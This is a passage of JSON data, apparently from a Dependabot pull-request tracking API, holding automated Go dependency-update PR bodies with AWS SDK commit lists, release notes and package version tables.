href=\"https://github.com/aws/aws-sdk-go-v2/commit/2b41455a8d88032b9b76b0bafbe23de0a61a6f29\"\u003e\u003ccode\u003e2b41455\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2327a1b15b5f16414e715325bc9579082fde0767\"\u003e\u003ccode\u003e2327a1b\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9225797aa8ce8661d61f4628973aface4e01c922\"\u003e\u003ccode\u003e9225797\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7b6f675adb365c7b069aaf2a8e81c4b8f8a5d08e\"\u003e\u003ccode\u003e7b6f675\u003c/code\u003e\u003c/a\u003e Bump smithy-go to 1.25 (again) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3390\"\u003e#3390\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/c8b6a97220901cccfd8a06f6f25aef65a967384c\"\u003e\u003ccode\u003ec8b6a97\u003c/code\u003e\u003c/a\u003e Release 2026-04-16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/4a05c2ba948715d305aff4519154abe2c4799246\"\u003e\u003ccode\u003e4a05c2b\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6cd4cc9201382be2638c8b4951b5d92de73c1161\"\u003e\u003ccode\u003e6cd4cc9\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3153bed494fb9e426640b30c7b91be0510b20362\"\u003e\u003ccode\u003e3153bed\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fe3cef6cc115a2915f5410c739dc73d51553d709\"\u003e\u003ccode\u003efe3cef6\u003c/code\u003e\u003c/a\u003e Make AccountIDEndpointRouting aware of bdd endpoints (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3387\"\u003e#3387\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.40.1...v1.41.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/sts` from 1.41.10 to 1.42.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ee5e3f05637540596cc7aab1359742000a8d533a\"\u003e\u003ccode\u003eee5e3f0\u003c/code\u003e\u003c/a\u003e Release 2023-11-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b65c226f47aa1f837699664bdc65c3c3e3611765\"\u003e\u003ccode\u003eb65c226\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7a194b9b0344774a5af100d11ea2066c5b0cf234\"\u003e\u003ccode\u003e7a194b9\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0cb924a0007bc681d12f382a604368e0660827ee\"\u003e\u003ccode\u003e0cb924a\u003c/code\u003e\u003c/a\u003e Add support for configured endpoints. (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2328\"\u003e#2328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/61039fea9cc9e080c53382850c87685b5406fd68\"\u003e\u003ccode\u003e61039fe\u003c/code\u003e\u003c/a\u003e Release 2023-10-31\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/797e0560769725635218fc30a2554c1bbaccc01b\"\u003e\u003ccode\u003e797e056\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/822585d3f621a7c5844584d8e471c32f852702aa\"\u003e\u003ccode\u003e822585d\u003c/code\u003e\u003c/a\u003e Update SDK's smithy-go dependency to v1.16.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/abf753db747dd256f3ee69712a19d1d3dc681f23\"\u003e\u003ccode\u003eabf753d\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/99861c071109ce5ee4f1cb3b72ead2062b3bd86c\"\u003e\u003ccode\u003e99861c0\u003c/code\u003e\u003c/a\u003e lang: bump minimum go version to 1.19 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2338\"\u003e#2338\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2ac0a53ac45acaadc4526fd25b643dc46032b02a\"\u003e\u003ccode\u003e2ac0a53\u003c/code\u003e\u003c/a\u003e Release 2023-10-30\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ecs/v1.41.10...service/s3/v1.42.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e","html_url":"https://github.com/grafana/grafana/pull/124765","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/grafana%2Fgrafana/issues/124765","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/124765/packages"},{"uuid":"4425616591","node_id":"PR_kwDOFyRkIM7afguh","number":10766,"state":"closed","title":"Bump the all-go-mod-patch-and-minor group across 2 directories with 43 updates","user":"dependabot[bot]","labels":["ok-to-test","size/XXL","dependabot"],"assignees":[],"locked":false,"comments_count":4,"pull_request":true,"closed_at":"2026-05-19T04:22:36.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-12T02:01:36.000Z","updated_at":"2026-05-19T04:22:38.000Z","time_to_close":613260,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"all-go-mod-patch-and-minor","update_count":43,"packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.50.36","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-sdk-go-v2","old_version":"1.30.1","new_version":"1.41.7","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/config","old_version":"1.26.6","new_version":"1.32.17","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ec2","old_version":"1.167.1","new_version":"1.301.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ecr","old_version":"1.27.4","new_version":"1.57.2","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/eks-anywhere-packages","old_version":"0.4.5","new_version":"0.4.15","repository_url":"https://github.com/aws/eks-anywhere-packages"},{"name":"github.com/aws/etcdadm-bootstrap-provider","old_version":"1.0.17","new_version":"1.0.19","repository_url":"https://github.com/aws/etcdadm-bootstrap-provider"},{"name":"github.com/aws/etcdadm-controller","old_version":"1.0.25","new_version":"1.0.27","repository_url":"https://github.com/aws/etcdadm-controller"},{"name":"github.com/bmc-toolbox/bmclib/v2","old_version":"2.1.1-0.20231206130132-1063371b9ed6","new_version":"2.3.5","repository_url":"https://github.com/bmc-toolbox/bmclib"},{"name":"github.com/docker/cli","old_version":"29.2.0+incompatible","new_version":"29.4.3+incompatible","repository_url":"https://github.com/docker/cli"},{"name":"github.com/go-git/go-git/v5","old_version":"5.17.1","new_version":"5.19.0","repository_url":"https://github.com/go-git/go-git"},{"name":"github.com/go-jose/go-jose/v3","old_version":"3.0.4","new_version":"3.0.5","repository_url":"https://github.com/go-jose/go-jose"},{"name":"github.com/nutanix-cloud-native/prism-go-client","old_version":"0.3.4","new_version":"0.7.2","repository_url":"https://github.com/nutanix-cloud-native/prism-go-client"},{"name":"github.com/onsi/gomega","old_version":"1.38.2","new_version":"1.40.0","repository_url":"https://github.com/onsi/gomega"},{"name":"github.com/spf13/cobra","old_version":"1.10.1","new_version":"1.10.2","repository_url":"https://github.com/spf13/cobra"},{"name":"github.com/vmware/govmomi","old_version":"0.51.0","new_version":"0.54.0","repository_url":"https://github.com/vmware/govmomi"},{"name":"go.uber.org/zap","old_version":"1.27.1","new_version":"1.28.0","repository_url":"https://github.com/uber-go/zap"},{"name":"golang.org/x/oauth2","old_version":"0.33.0","new_version":"0.36.0","repository_url":"https://github.com/golang/oauth2"},{"name":"gopkg.in/ini.v1","old_version":"1.67.0","new_version":"1.67.2"},{"name":"helm.sh/helm/v3","old_version":"3.18.5","new_version":"3.20.2","repository_url":"https://github.com/helm/helm"},{"name":"sigs.k8s.io/cluster-api/test","old_version":"1.11.1","new_version":"1.11.10","repository_url":"https://github.com/kubernetes-sigs/cluster-api"},{"name":"sigs.k8s.io/controller-runtime","old_version":"0.22.4","new_version":"0.22.5","repository_url":"https://github.com/kubernetes-sigs/controller-runtime"},{"name":"github.com/golang-jwt/jwt/v5","old_version":"5.2.2","new_version":"5.3.1","repository_url":"https://github.com/golang-jwt/jwt"},{"name":"github.com/itchyny/gojq","old_version":"0.12.17","new_version":"0.12.19","repository_url":"https://github.com/itchyny/gojq"},{"name":"k8s.io/kubelet","old_version":"0.29.5","new_version":"0.29.15","repository_url":"https://github.com/kubernetes/kubelet"}],"path":null,"ecosystem":"go"},"body":"Bumps the all-go-mod-patch-and-minor group with 25 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.50.36` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.30.1` | `1.41.7` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.32.17` |\n| [github.com/aws/aws-sdk-go-v2/service/ec2](https://github.com/aws/aws-sdk-go-v2) | `1.167.1` | `1.301.0` |\n| [github.com/aws/aws-sdk-go-v2/service/ecr](https://github.com/aws/aws-sdk-go-v2) | `1.27.4` | `1.57.2` |\n| [github.com/aws/eks-anywhere-packages](https://github.com/aws/eks-anywhere-packages) | `0.4.5` | `0.4.15` |\n| [github.com/aws/etcdadm-bootstrap-provider](https://github.com/aws/etcdadm-bootstrap-provider) | `1.0.17` | `1.0.19` |\n| [github.com/aws/etcdadm-controller](https://github.com/aws/etcdadm-controller) | `1.0.25` | `1.0.27` |\n| [github.com/bmc-toolbox/bmclib/v2](https://github.com/bmc-toolbox/bmclib) | `2.1.1-0.20231206130132-1063371b9ed6` | `2.3.5` |\n| [github.com/docker/cli](https://github.com/docker/cli) | `29.2.0+incompatible` | `29.4.3+incompatible` |\n| [github.com/go-git/go-git/v5](https://github.com/go-git/go-git) | `5.17.1` | `5.19.0` |\n| [github.com/go-jose/go-jose/v3](https://github.com/go-jose/go-jose) | `3.0.4` | `3.0.5` |\n| [github.com/nutanix-cloud-native/prism-go-client](https://github.com/nutanix-cloud-native/prism-go-client) | `0.3.4` | `0.7.2` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.40.0` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.10.1` | `1.10.2` |\n| [github.com/vmware/govmomi](https://github.com/vmware/govmomi) | `0.51.0` | `0.54.0` |\n| [go.uber.org/zap](https://github.com/uber-go/zap) | `1.27.1` | `1.28.0` |\n| [golang.org/x/oauth2](https://github.com/golang/oauth2) | `0.33.0` | `0.36.0` |\n| gopkg.in/ini.v1 | `1.67.0` | `1.67.2` |\n| [helm.sh/helm/v3](https://github.com/helm/helm) | `3.18.5` | `3.20.2` |\n| [sigs.k8s.io/cluster-api/test](https://github.com/kubernetes-sigs/cluster-api) | `1.11.1` | `1.11.10` |\n| [sigs.k8s.io/controller-runtime](https://github.com/kubernetes-sigs/controller-runtime) | `0.22.4` | `0.22.5` |\n| [github.com/golang-jwt/jwt/v5](https://github.com/golang-jwt/jwt) | `5.2.2` | `5.3.1` |\n| [github.com/itchyny/gojq](https://github.com/itchyny/gojq) | `0.12.17` | `0.12.19` |\n| [k8s.io/kubelet](https://github.com/kubernetes/kubelet) | `0.29.5` | `0.29.15` |\n\nBumps the all-go-mod-patch-and-minor group with 10 updates in the /release/cli directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.54.12` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.32.7` | `1.41.7` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.32.17` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.40.0` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.10.1` | `1.10.2` |\n| [helm.sh/helm/v3](https://github.com/helm/helm) | `3.18.5` | `3.20.2` |\n| [sigs.k8s.io/controller-runtime](https://github.com/kubernetes-sigs/controller-runtime) | `0.22.4` | `0.22.5` |\n| [github.com/itchyny/gojq](https://github.com/itchyny/gojq) | `0.12.17` | `0.12.19` |\n| [github.com/aws/aws-sdk-go-v2/service/kms](https://github.com/aws/aws-sdk-go-v2) | `1.37.9` | `1.51.1` |\n| [github.com/fsouza/go-dockerclient](https://github.com/fsouza/go-dockerclient) | `1.12.2-0.20250814055408-c31f6141d29b` | `1.13.1` |\n\n\nUpdates `github.com/aws/aws-sdk-go` from 1.50.36 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.7 (2025-04-22)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/s3/s3manager\u003c/code\u003e: Abort multipart download if object is modified during download\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/4986\"\u003e4986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.6 (2025-01-15)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix broken printf for go1.24\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.5 (2024-07-30)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/appstream\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eAdded support for Red Hat Enterprise Linux 8 on Amazon AppStream 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/autoscaling\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eIncrease the length limit for VPCZoneIdentifier from 2047 to 5000\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/codepipeline\u003c/code\u003e: Updates service API, documentation, and paginators\n\u003cul\u003e\n\u003cli\u003eAWS CodePipeline V2 type pipelines now support stage level conditions to enable development teams to safely release changes that meet quality and compliance requirements.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eDoc only update for changes to deletion API.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticloadbalancing\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/eventbridge\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/logs\u003c/code\u003e: Updates service API\n\u003cul\u003e\n\u003cli\u003eAdd v2 smoke tests and smithy smokeTests trait for SDK testing.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/models.lex.v2\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/rolesanywhere\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/tnb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/workspaces\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRemoving multi-session as it isn't supported for pools\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.4 (2024-07-29)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRenaming full service name as it appears in developer documentation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/memorydb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/163aada692ed32951f979aacf452ded4c03b8a7c\"\u003e\u003ccode\u003e163aada\u003c/code\u003e\u003c/a\u003e release v1.55.7 (2025-04-22) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/5346\"\u003e#5346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/9eb2bfd2f949fc81b96cee6b5aae6d9b84abea75\"\u003e\u003ccode\u003e9eb2bfd\u003c/code\u003e\u003c/a\u003e Abort multi part download if the object is modified during download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/8d203ccff393340d080be0417d091cc60354449b\"\u003e\u003ccode\u003e8d203cc\u003c/code\u003e\u003c/a\u003e Update bug-report.yml\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.50.36...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2` from 1.30.1 to 1.41.7\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.30.1...v1.41.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/config` from 1.26.6 to 1.32.17\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.26.6...config/v1.32.17\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/credentials` from 1.17.7 to 1.19.16\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca 